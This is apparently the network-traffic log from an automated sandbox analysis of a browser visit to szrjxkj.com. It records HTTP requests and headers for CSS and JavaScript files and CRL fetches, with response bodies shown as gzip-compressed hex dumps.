b3 50 8d 31 c6 88 35 96 b2 9d 57 f9 7e e9 9c 73 ce b8 c1 28 da 33 8f cb 39 12 de 54 [TRUNCATED]
            Data Ascii: wOF2?FFTM`B<c6$0 A?webf[:BvH6-~Whac&1m YW?pTAX>N;ihFB|MpA+::V(J^gu\BgM&HFbVRmcUMQu&+)ppkhq;Mxx9p}^2Egf[c^3P15W~s(39T*?}?yR2~V<7ZiB2bQS"Op=06`K05C1E,I4j>Zg|d;!0;?O:!E M*[B(.X&*K5.{BmLl_Bj]F>.mC4gJ6l%(R4Z%Z #pPm=kQ5G{?5_^@3E= :Tmu f2B)*t3:@dgTqqFsRy29?fnpR:wh,+B2r"cg4YW6BxlXb%q=ECYGQr;{!wKX:@N ZLQ~HuK yOq9_C>x}XhFV%H[cRHN3mJ-ep^#"B&ft~p(%pUPQFw2;;->
            Mar 13, 2025 10:53:50.352735996 CET383OUTGET /favicon.ico HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Referer: http://szrjxkj.com/dongtai/8622.html
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:50.688874006 CET317INHTTP/1.1 404 Not Found
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:50 GMT
            Content-Type: text/html
            Content-Length: 148
            Connection: keep-alive
            ETag: "6752678f-94"
            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


            Session IDSource IPSource PortDestination IPDestination Port
            1192.168.2.449731142.250.185.9980
            TimestampBytes transferredDirectionData
            Mar 13, 2025 10:53:08.577027082 CET202OUTGET /r/gsr1.crl HTTP/1.1
            Cache-Control: max-age = 3000
            Connection: Keep-Alive
            Accept: */*
            If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
            User-Agent: Microsoft-CryptoAPI/10.0
            Host: c.pki.goog
            Mar 13, 2025 10:53:09.231719971 CET223INHTTP/1.1 304 Not Modified
            Date: Thu, 13 Mar 2025 09:22:23 GMT
            Expires: Thu, 13 Mar 2025 10:12:23 GMT
            Age: 1846
            Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
            Cache-Control: public, max-age=3000
            Vary: Accept-Encoding
            Mar 13, 2025 10:53:09.238943100 CET200OUTGET /r/r4.crl HTTP/1.1
            Cache-Control: max-age = 3000
            Connection: Keep-Alive
            Accept: */*
            If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
            User-Agent: Microsoft-CryptoAPI/10.0
            Host: c.pki.goog
            Mar 13, 2025 10:53:09.424721956 CET223INHTTP/1.1 304 Not Modified
            Date: Thu, 13 Mar 2025 09:22:26 GMT
            Expires: Thu, 13 Mar 2025 10:12:26 GMT
            Age: 1843
            Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
            Cache-Control: public, max-age=3000
            Vary: Accept-Encoding


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.44972638.174.150.133801004C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            Mar 13, 2025 10:53:14.503597975 CET346OUTGET /skin/css/plugins.css HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: text/css,*/*;q=0.1
            Referer: http://szrjxkj.com/dongtai/8622.html
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:18.333086967 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:18 GMT
            Content-Type: text/css
            Last-Modified: Wed, 08 Nov 2023 16:06:34 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bb20a-1031d"
            Expires: Thu, 13 Mar 2025 21:53:18 GMT
            Cache-Control: max-age=43200
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 33 64 36 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 7d eb 8e e3 ca 91 e6 7f 03 7e 07 ce 69 1c 74 d5 41 51 2d 92 52 5d 54 f0 ce f1 ce c2 18 63 7d 01 d6 9e c5 ce 7a bd 06 25 51 55 74 49 a2 8e 44 d5 a5 0b 0d ec af f9 bd d8 47 d8 47 9b 27 d9 2f f2 12 91 24 23 55 d5 c7 67 b0 33 3d b6 bb c5 8f c9 bc 44 46 46 46 7c 19 f9 e9 bb 9f ff 2c f9 2e f9 f6 47 fe 1f bd 6c 0a f8 63 b5 d9 ad cb b6 4a 7e 57 6e aa 59 f2 cb dd 6e f3 52 af 93 94 fe 96 fc a6 dc 2e eb ed 9d 80 92 a4 fb d2 3f fd 97 5f cf 92 fb b6 dd 1d 66 9f 3e b5 f7 d5 a6 da 94 fb c5 fd 68 d1 6c 3e 2d ab 4d f3 e9 be dd ac 3f 95 b6 d0 4f e6 dd ff 54 1d 16 fb 7a d7 d6 cd 56 3e 57 1f 92 72 9b 00 97 ac dd 27 ff f1 8f bf fd 4d d2 fa ca 3d dd d7 8b fb 04 a5 56 87 e4 a9 6e ef 93 e3 b6 fe e1 58 e1 a5 65 b2 58 57 78 77 59 1d ea bb ed 28 f9 75 9b dc 57 eb dd 21 79 69 8e 49 db 24 8b 7d 45 ad 2b 93 79 55 1e db 7a 75 5c 0f 3f f3 54 cd 0f 75 5b 99 97 51 13 5b 54 b5 b4 5f fa 8f 4d d3 1e da 7d b9 4b 1e 27 a3 7c 94 25 68 26 6a d9 56 87 36 99 cb b3 6a 7f 40 8b 46 dc 81 28 e7 [TRUNCATED]
            Data Ascii: 3d68}~itAQ-R]Tc}z%QUtIDGG'/$#Ug3=DFFF|,.GlcJ~WnYnR.?_f>hl>-M?OTzV>Wr'M=VnXeXWxwY(uW!yiI$}E+yUzu\?Tu[Q[T_M}K'|%h&jV6j@F(ZfWn(X_<m_f?Ki$ypp|K`O%BE5jm*^<_h>'iO?uU7f^-2mv}U_?5U./wQhZ>k[[OU}w&}YW-5wMS0! 2gxaP^T~C?~<NT?-/IVno<+Wm+Z_k:+:`y[P6wuj?yHV3W:l<&UJu^,u]Syo;AZ*7*jyVavkuI]E;x}oMM3W8,J/X&Qfq$hE.":?~_kZ$8Wd
            Mar 13, 2025 10:53:18.333101034 CET1236INData Raw: a1 da df 55 2f c9 7f 3e ee d6 55 7b 78 78 49 ce be ff 5c 3e 36 eb e6 61 dd 6c ce b1 92 d2 fa 88 e5 51 7e 1c dd 61 09 3b ce 47 75 f3 09 2a ce 94 8d 99 4d 65 a7 a4 63 eb 45 4a 92 6f 97 cb e4 37 98 f0 db 43 f5 37 94 b3 76 25 9c 51 8d 67 c9 1f 7e fd
            Data Ascii: U/>U{xxI\>6alQ~a;Gu*MecEJo7C7v%Qg~"?a9w?},"=uYh\fv]otn_"Zj{-R+Ewco-x)(||7}jSSR(z{ioMMnS
            Mar 13, 2025 10:53:18.333115101 CET448INData Raw: 96 ab e8 77 59 ac 16 d8 b3 c7 e7 78 ce c2 65 70 4b 4c 1b 6c 95 f4 a6 b0 7c 19 a8 f1 e9 68 63 c5 42 46 30 15 c1 82 05 44 9b c2 79 b5 ad 16 ad ae 4b 73 16 2f c2 aa a5 b1 74 2d ee cb 7d 8b 26 6c 8f 2a b0 60 29 33 40 ad ac 42 e4 ac 6e 49 3b e9 28 91
            Data Ascii: wYxepKLl|hcBF0DyKs/t-}&l*`)3@BnI;(5rDu:.DZ!UM["g~mf!f~,2iRl*D"ZfwF\"Qqph2noR<WK.OTHp>U"=
            Mar 13, 2025 10:53:18.335779905 CET1236INData Raw: d8 aa 5e 63 eb 90 92 33 5d 03 5e b2 70 ad ea bd da 8c 4b 16 28 6c 29 d4 55 ef 92 a5 09 88 48 21 2c 4b 66 5f 92 52 ec 44 ad 0e cb 93 c5 45 b6 ed 97 2c 51 d1 6d ce 25 cb d4 0a de 20 f5 5b 2c 52 70 77 3f a1 8f 22 f6 cb 25 0b 96 c5 a9 65 b1 50 99 98
            Data Ascii: ^c3]^pK(l)UH!,Kf_RDE,Qm% [,Rpw?"%ePb\LYl%LP%]ydr"vGX5eb+4Sh.JUXzRKcAoV317TcoZ}r7YzBu\Fi8\"W,r
            Mar 13, 2025 10:53:18.335793018 CET1236INData Raw: ae 58 16 2d b2 59 60 6a ea c4 2b 1c 16 f0 c4 2b 53 81 5d b3 7e 89 41 59 2a 6d a9 5e e0 d4 1a 88 9f 0e 46 fd 29 ef ca 4a fc 75 11 f3 7f c5 62 09 a2 71 73 b2 2c 16 4b 42 aa f5 62 89 dc 36 38 f6 08 36 be 71 ab 62 d3 43 54 74 f5 0d 16 cb de 1b 4b 75
            Data Ascii: X-Y`j++S]~AY*m^F)Jubqs,KBb686qbCTtKu/bGg+8~eu{(RkpM|Uc3X6@k4c^+"HlR]Lop|{Y|r@>f1,44Z>f24,J
            Mar 13, 2025 10:53:18.335802078 CET448INData Raw: 88 8d ae bc f9 20 f3 15 88 46 c8 ee c2 8b 89 2d 6e b5 d7 19 d3 b9 30 1b 5d 81 1b dd c2 bd 16 45 69 4b 04 39 09 a7 d1 36 fa a1 aa 5c 98 8e ae 58 58 e6 aa f1 29 84 47 0f d4 c3 79 b9 50 1e 1d f0 80 f4 89 6a b0 27 bf 16 8d 69 ea aa 0e 8c ac e1 74 ac
            Data Ascii: F-n0]EiK96\XX)GyPj'itGT5!?CoBh?V3a?zO.vZ\YRji,HW>Na8/ v^$"cyF#@jX^bO9ZXaS*7l"Z(AB]
            Mar 13, 2025 10:53:18.338104963 CET1236INData Raw: 22 37 a0 2a 46 3e cf 42 e9 90 07 8d ea 93 cf 59 24 2d 2c 1a 96 ce 85 43 69 91 26 3f 9f b2 d3 9f b3 68 5a dc a9 81 64 11 75 50 f5 10 59 2e 14 4a 03 53 3f ca ba 91 b2 77 96 73 04 62 9e 40 16 80 a6 00 19 a7 52 f5 f8 9c e5 b3 fb 4a 44 9c 85 46 d9 81
            Data Ascii: "7*F>BY$-,Ci&?hZduPY.JS?wsb@RJDFk%%SBe_ZqbWNH`;D'%"xZARpR^U+G)$_JXNJ5upXzE8-GtxR>1f
            Mar 13, 2025 10:53:18.338255882 CET1236INData Raw: d2 19 7a 1d 29 11 44 db a0 48 5a da 42 88 92 be 48 62 84 c4 06 86 97 e1 00 ac f6 27 6b 42 0b 54 31 41 28 11 dc 0c 64 f1 52 95 aa a4 50 84 9b f3 ee 48 79 45 17 87 43 a1 95 28 0c 48 86 d2 95 89 5a b6 cd 42 b8 8f 8c fd 6b f9 88 83 e4 74 9d a2 5a 38
            Data Ascii: z)DHZBHb'kBT1A(dRPHyEC(HZBktZ8%{%hBJCR$(3(CyQ(q5Zq($wpp4.y@aUHE.Ll|jdSBwiLp E3> uP&XQT?;P-&*fuS
            Mar 13, 2025 10:53:18.338267088 CET448INData Raw: 6f b4 54 e3 9c c2 6d 44 76 19 50 af e9 da 83 c8 ed 0d 85 30 1b c1 dc c5 d5 1f f6 2e 66 77 68 5f eb 2c a1 38 e2 54 4d 85 13 31 c6 15 16 89 cb 0a d5 11 b7 d9 2f 52 ba 98 42 2d 93 45 1f db 42 1c 75 54 49 53 85 70 1c 71 93 07 d1 b5 68 a3 ab 16 c7 8a
            Data Ascii: oTmDvP0.fwh_,8TM1/RB-EBuTISpqh[QuAasP!GX+lfBdAXjEYa#^x&aZ7)G\i!=nWjW(qm$I#*Pd@D6,~<A]DHfz3f
            Mar 13, 2025 10:53:18.341860056 CET1236INData Raw: 58 86 b5 89 70 10 5b a4 a8 59 6b 03 3f 11 ee 21 85 7d d4 b3 bc 13 21 1d 3e 82 07 a0 99 5c 13 e1 1b 3e dd 97 ed 01 8c 31 a5 43 27 63 de 90 3c eb 0a 7c 22 3c c3 97 f2 be d1 3f c5 a2 f5 02 51 38 e2 ae a5 88 de 9b 08 c3 d0 21 d5 3a b1 60 d5 38 c9 89
            Data Ascii: Xp[Yk?!}!>\>1C'c<|"<?Q8!:`8Ts.P)5X6\MAPD!2Ld #~pPb\zvLhOGDMZd1EGOlfKB|Jc*vQ@.aMI."
            Mar 13, 2025 10:53:18.341873884 CET1236INData Raw: bf 92 15 f8 8c fd af 8c 7e f6 35 2c e7 07 30 01 da ea 96 f8 07 e3 5b 7b c2 77 7c 8b fb fd 60 39 cd 76 8d f1 be de 9a 2b ac 67 1f 56 ab d5 ad 49 77 8b 24 e2 a0 a8 99 26 52 07 dd d2 4d f3 86 20 36 cb 2e 51 ba c1 d8 dc e1 b3 94 ea 5f 6d 6e 4d 34 32
            Data Ascii: ~5,0[{w|`9v+gVIw$&RM 6.Q_mnM42Y^*7eKjXHg+{v5K<[[ph[Mx+"7"%N0"T'$UDy~J*'rRnh8M2V2&l
            Mar 13, 2025 10:53:18.598422050 CET335OUTGET /skin/js/bootstrap.min.js HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: */*
            Referer: http://szrjxkj.com/dongtai/8622.html
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:18.946115971 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:18 GMT
            Content-Type: application/javascript
            Last-Modified: Wed, 08 Nov 2023 16:07:22 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bb23a-d9e7"
            Expires: Thu, 13 Mar 2025 21:53:18 GMT
            Cache-Control: max-age=43200
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 34 32 38 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dd 7d 6b 57 dc 46 b6 f6 f7 b3 d6 f9 0f 8d 26 07 77 0f a2 0d 49 e6 9d 19 b0 c2 c2 80 63 12 0c 04 b0 9d 84 61 58 82 16 20 bb 91 da dd 6a db 04 38 bf fd 7d f6 a5 4a 55 ba 40 3b 33 39 eb ac e3 0f a6 55 2a d5 75 d7 be ef 5d 4f ff 3c f7 9f ff d1 e9 fc b9 f3 3c cf 8b 49 31 8e 47 9d 8f df f6 bf ee 2f 77 ba 57 45 31 9a ac 3c 7d 7a 99 14 67 e6 65 ff 3c bf 7e da 93 2f 36 f2 d1 cd 38 bd bc 2a 3a 5f 2f 2d 2f 2f e2 bf bf 75 8e ae 12 a7 a5 f5 69 71 95 8f 27 4e 53 69 71 35 3d e3 46 8a 4f 67 93 a7 b6 dd a7 97 e8 f9 6a f2 f4 3c cf 8a 71 7a 36 2d f0 99 76 b3 93 9e 27 d9 24 19 74 a6 d9 20 19 77 5e 6d 1f cd d2 de d9 30 3f 7b 7a 1d 4f 8a 64 fc 74 67 7b 63 6b f7 70 4b da 7b 8a c1 cf 5d 4c b3 f3 22 cd b3 6e 11 26 bd db 20 3f 7b 97 9c 17 41 14 15 37 a3 24 bf e8 24 9f 47 f9 b8 98 cc cf 07 d4 e7 45 9a 25 83 60 ce bc bc ce 07 d3 61 b2 96 74 b5 56 38 4e 3e 4c d3 71 d2 0d 46 f9 68 94 8c fb ef 26 41 af 2c 7c f7 61 9a 8c 6f 82 5e 6f 25 30 bd 96 1d 49 e3 f3 f3 f2 b7 1f 5f 0f d6 e4 67 [TRUNCATED]
            Data Ascii: 428f}kWF&wIcaX j8}JU@;39U*u]O<<I1G/wWE1<}zge<~/68*:_/-//uiq'NSiq5=FOgj<qz6-v'$t w^m0?{zOdtg{ckpK{]L"n& ?{A7$$GE%`atV8N>LqFh&A,|ao^o%0I_g8i7{%}}Xy'w-Iw^bInyIe9.qc<dj,ZzTFqvlzawwsaM.[piIi8-^;sLp&L{venI1gd~yaeP),wk&WDx|)dL0Gt8ld}Xz't-8D{23|&QB+ujE:4wKf29#.}>b+>ja8gX]lJ0=wa=`{~Mx,V7Xa"{p]_>PV\E\6I'}`$Es:K>C>wvOv77U8I:ExywwLGv
            Mar 13, 2025 10:53:19.126190901 CET329OUTGET /skin/js/plugins.js HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: */*
            Referer: http://szrjxkj.com/dongtai/8622.html
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:19.477404118 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:19 GMT
            Content-Type: application/javascript
            Last-Modified: Wed, 08 Nov 2023 16:07:26 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bb23e-315b0"
            Expires: Thu, 13 Mar 2025 21:53:19 GMT
            Cache-Control: max-age=43200
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 34 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc bd eb 7a 1b 47 76 36 fa 7f 9e 67 ee a1 d5 91 69 40 04 40 52 b2 93 09 28 88 9f 2c c9 33 4a ac 91 62 ca 73 d8 1c 8d 9f 26 d0 24 5b 06 d1 34 d0 a0 44 93 bc 98 ef 5a f6 8d ed f7 5d ab 8e 7d 20 29 79 92 9d 24 07 8b a8 ae e3 aa 55 ab d6 b9 b6 1e fc f6 37 c9 83 e4 8b cf fc 1f 36 96 0e de e6 a7 67 f3 ac ca 93 3f 66 a7 f9 38 79 7a 76 76 7a 51 cc 93 21 ff 4a be cb 16 b3 62 71 ec 2b 25 49 dc e8 87 ef 5f 8e 93 93 aa 3a 5b 8d b7 b6 aa 93 fc 34 3f cd 96 d3 93 d1 b4 3c dd 9a e5 a7 e5 d6 49 75 3a df ca b4 d3 2d 69 fb 3c 5f 4d 97 c5 59 55 94 0b 3f 5c b1 4a b2 45 82 7a c9 dc 0c f9 87 b7 af be 4b 2a 3b b9 0f 27 c5 f4 24 41 af f9 2a f9 50 54 27 c9 7a 51 fc bc ce d1 68 96 4c e7 39 da ce f2 55 71 bc 18 25 2f ab e4 24 9f 9f ad 92 8b 72 9d 54 65 32 5d e6 5c 5d 96 1c e6 d9 ba 2a 8e d6 f3 e6 30 1f f2 c3 55 51 e5 d2 18 33 d1 ae f2 99 8e f4 4d 59 56 ab 6a 99 9d 25 e7 5f 8d 1e 8e 76 12 2c 13 b3 ac f2 55 95 1c fa 6f f9 72 85 15 8d 1c 00 d1 cf 87 7c 3e 4f ca e5 71 b6 28 7e 41 6f [TRUNCATED]
            Data Ascii: 4000zGv6gi@@R(,3Jbs&$[4DZ]} )y$U76g?f8yzvvzQ!Jbq+%I_:[4?<Iu:-i<_MYU?\JEzK*;'$A*PT'zQhL9Uq%/$rTe2]\]*0UQ3MYVj%_v,Uor|>Oq(~AoyHlu!S[F\Aqrtdg63vwA?/?|)Snd+eWyX*MR5M&8#Xk=w./w=B[$xV.<IRblW}S;''}-<`H|u\^&=~b[}{7YzWuVdIM#)[|*yQ]{$e8 BrY~XqAU=]zY1;(XlKquUal+n$[pI%E^T[Ol--y%n(%q,-AB?8y?$|QWulFzcEB0g7Tgv9hE3M|UnJ6 ^p,


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.44973538.174.150.133801004C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            Mar 13, 2025 10:53:14.516179085 CET344OUTGET /skin/css/style.css HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: text/css,*/*;q=0.1
            Referer: http://szrjxkj.com/dongtai/8622.html
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:16.169471979 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:15 GMT
            Content-Type: text/css
            Last-Modified: Wed, 08 Nov 2023 17:36:16 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bc710-1ffb6"
            Expires: Thu, 13 Mar 2025 21:53:15 GMT
            Cache-Control: max-age=43200
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 35 30 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 93 1c b7 91 e0 e7 e3 af a8 a5 c2 e7 a1 96 3d 9a ee 99 e1 3c 36 e4 b0 1e e6 d9 11 6b 9f 4e f2 ee da 61 fb 22 fa 51 33 53 66 4f f7 b8 bb 87 14 b5 e1 fb ed 97 99 c8 04 12 40 a2 1e cd a1 48 5b 23 59 34 bb 0a c8 4a 24 12 89 44 be f0 d9 a7 4f aa 4f ab 9f ed f9 0f f4 c5 ee bf af 6f ef 96 d3 5d 5d fd 6e 7a 5b 5f 56 5f dc dd dd be 6d 96 d5 08 ff 56 fd fb 74 b5 68 56 d7 a1 51 55 61 9f 9b dd ee ee f2 b3 37 6f de 1c ce d6 eb dd 76 b7 99 de dd ce 0e e7 eb 5b 7c f9 9f f5 66 db ac 57 97 d5 f8 f0 88 bf b1 27 86 3f 83 ee 9f 3d f9 ec d3 27 9f ef ff cf 93 0a fe f9 cd ef be fe d5 1f de 09 0a 81 39 1a 3f ab be ad b7 f5 ce fd 9a 3c ab be 58 35 b7 d3 1d 8c 76 eb 1e 1d 3f ab 7e ff f6 6e 7d 0d 04 b9 79 eb 1e 9d 3c ab fe 63 d7 2c 9b 5d 53 6f 9f b8 47 a7 cf aa 2f ef 77 bb f5 ca fd 7c 01 9d 9a dd b2 76 bf ce 9e 55 df 2d 9b 45 bd a9 7e b5 ac 6f eb d5 8e 41 9f 43 ab e9 cc b5 b9 80 36 f5 b2 9e ef 66 eb ef e9 c9 f8 08 40 6e ea e9 62 be b9 bf 75 8d c6 80 ec 37 d3 eb 66 45 f8 [TRUNCATED]
            Data Ascii: 50ea}k=<6kNa"Q3SfO@H[#Y4J$DOOo]]nz[_V_mVthVQUa7ov[|fW'?='9?<X5v?~n}y<c,]SoG/w|vU-E~oAC6f@nbu7fEVW[~/%`G=h|Y 05|k%fVzN/f{nPn8 Lt}k.3@M^7zPO|)\_cj',k[h3#o|\o.O&+hRa\eG7us}}riz^VnGG?'d^vhKlG-g~,O.#Dob^:lfF1[a}?g.j~v;v_},N/tzM(_?<E|z=>\m@&^?}Iw|M5/z)HSXH
            Mar 13, 2025 10:53:16.169480085 CET224INData Raw: d4 6b 53 bb 79 97 af 10 76 87 b3 cd fa cd b6 de dc df 81 7c 5b d4 d4 d0 43 3c 9c c8 98 a2 49 9a cf e7 f8 2d e1 ac a3 a3 e4 d3 d2 0d c1 3b fe 89 e9 8e b3 59 fd 4b 73 7b b7 de ec a6 ab 9d c3 e3 75 b3 bd 9f 2e 97 6f 55 87 68 1e e6 cb 06 66 60 03 8c
            Data Ascii: kSyv|[C<I-;YKs{u.oUhf`spTnL0ZoA6UYnhMGjv~;-KkxX%KJ~GpbFaH4fuSo&{bH*k:d,
            Mar 13, 2025 10:53:16.169509888 CET1236INData Raw: 97 f5 74 73 d5 7c 7f 39 ab af d6 1b 1c 97 7f 32 bd 02 49 e8 c6 01 a2 05 76 a1 cb ea 69 f5 14 71 f0 eb 6c 87 24 71 04 b3 ba 21 6c 58 8c eb dd 0d b5 f9 e5 6d bd 68 a6 d5 7a b5 7c 5b 81 a0 86 dd a2 02 85 a5 3a b8 6d 56 23 1e d6 f1 69 7d fb 8c be f9
            Data Ascii: ts|92Iviql$q!lXmhz|[:mV#i}nowTLwmKgwSCdYW7U5\z9>qrMN?;Vr+NHh\rmqe>}.z+`/ZCEb&
            Mar 13, 2025 10:53:16.169521093 CET224INData Raw: c0 b8 51 47 11 00 ee c7 08 a8 bc 5b 83 0f 0a b5 1f 22 5d 09 8d 43 7c 71 88 08 1e 22 86 87 88 e2 21 e2 78 78 f3 82 68 1a cf df 37 eb 3b 70 7d 6d 8b 13 78 3c 3f 99 9c c0 94 f2 17 09 ba 03 ce 24 a0 af b8 8f 9c 04 f8 32 d1 a7 3c d1 0e 01 a6 54 84 49
            Data Ascii: QG["]C|q"!xxh7;p}mx<?$2<TI}gU}21"j4\'UckQCDq|IMi%a'"CD?NGV'z"JqicCg/3."`(F?2qo7?0)
            Mar 13, 2025 10:53:16.169533968 CET1236INData Raw: f8 6d f1 09 eb 89 e1 d9 4c 7a cb 24 3b 7d a4 14 4b 12 06 7a f6 e2 ac cf 40 7b a0 4a de 6b 73 a0 c2 43 29 aa 3c 77 5d 03 65 6a a6 bd 35 91 81 0d f1 db 8e 11 23 22 4f 6c cc 8f 3d 91 db d8 24 90 e9 f4 8c 2c 1c c8 01 2d fc 30 b9 70 2c 9c a2 ca 8f 3b
            Data Ascii: mLz$;}Kz@{JksC)<w]ej5#"Ol=$,-0p,;acFvqEW{~[D+U"vya538H?#gAG-r;e]HVG=li T$Gd)5$'JLG61PE;=~
            Mar 13, 2025 10:53:16.169595003 CET1236INData Raw: 5a fa e1 94 34 7c 04 e7 c9 12 35 72 b4 c9 12 75 a1 7d 20 40 d4 41 53 01 5a 05 12 44 ad 1c 1d 2c b0 98 81 dc 60 12 22 2d 6c 95 16 2e f6 27 dc ac a6 98 69 e6 da 1d 5c 60 c2 d4 f3 ea 93 f3 7a b2 a8 27 90 c3 02 7f 77 e3 a7 8c 2b 77 f2 d4 70 d0 1a f1
            Data Ascii: Z4|5ru} @ASZD,`"-l.'i\`z'w+wp@c SB%`Nf}{t,'Np:@)#^ZF\ZG5Kt[Lw88dAi4_iUhuO`fNx?M$4 u<8<~m?]
            Mar 13, 2025 10:53:16.169615030 CET448INData Raw: 13 c9 b3 b5 c6 e3 0b 48 b1 71 e9 39 06 a9 69 ec 09 a1 cf d3 90 47 3f 7e 79 83 d9 3a 06 30 3f fe 02 c0 52 37 45 81 d0 53 66 2f 7c 13 e8 de 83 0e dd 59 6b 06 e6 26 19 98 09 0c 94 7c 00 e8 30 32 74 74 6b 27 83 0e 3a 2d 92 c1 8c 66 ee 39 de b3 e2 78
            Data Ascii: Hq9iG?~y:0?R7ESf/|Yk&|02ttk':-f9xMid&u3.|h*!nfDDDR'it$TWe{OZHtB<I&`AmI>$b;7j$*CWk4&iN"~6P5Hr.
            Mar 13, 2025 10:53:16.169625998 CET1236INData Raw: 51 71 3c c3 f1 ae cc a2 14 fb 6a fb 7e 8a 44 28 0c a9 03 5d 12 72 de 17 09 15 69 35 63 f2 cf 28 f9 60 34 81 f3 a2 53 68 a3 fd 27 3c 66 44 78 12 a2 28 6c 49 22 a0 6b 42 d4 3c 88 bf 83 a3 df 92 ec 4b 61 e0 a9 5c 3d 74 c9 45 c8 a5 c2 f4 78 4b 69 22
            Data Ascii: Qq<j~D(]ri5c(`4Sh'<fDx(lI"kB<Ka\=tExKi"M Lxaj^$S7(?c*)Rx?uOKe6'yv]U"~bj?@z?8?~'!Xy*v@/(]16oVRT$sn
            Mar 13, 2025 10:53:16.169634104 CET224INData Raw: 41 97 4e 82 8d 79 51 10 0e ea 4e e3 1f c2 34 05 64 ba 59 a9 bd e3 7e b3 a7 b6 a9 c8 d6 30 7c 61 62 09 8b 12 db b9 77 2d 18 da f5 2f a4 d6 79 7f 3e 41 38 5d c2 21 6e d3 81 d4 3e a2 01 3f 60 cf 55 1b 7d 4a 3d 3a 10 b4 bb 95 16 65 a0 68 8f 45 a9 4a
            Data Ascii: ANyQN4dY~0|abw-/y>A8]!n>?`U}J=:ehEJ&{tkZu"[Pi]AajX\3Bp\I]%j_LIFP6iU|v?vNX$GU#u
            Mar 13, 2025 10:53:16.169640064 CET1236INData Raw: e0 0a 5a 5e 2d 77 f0 02 7c 5a 1b 11 68 59 8d 1a b2 03 4c be 90 ea 5b a8 3f 50 fd 76 bd a9 d9 23 22 91 e6 1b 78 7e 0b 8f 79 a3 0a 3f c3 da 94 67 b1 de 93 96 a2 14 c5 ae 70 df 0c 15 59 64 bd d6 03 94 b3 9c 7e 60 7c 37 3b b8 8c f9 f4 2e e1 76 ca ad
            Data Ascii: Z^-w|ZhYL[?Pv#"x~y?gpYd~`|7;.vjQYi2X9gMt:PyshN;Q2Yw#:89?M%(u;l++\ffp,%>,iQ8J/zVgcSygjmLOI4D,j!j
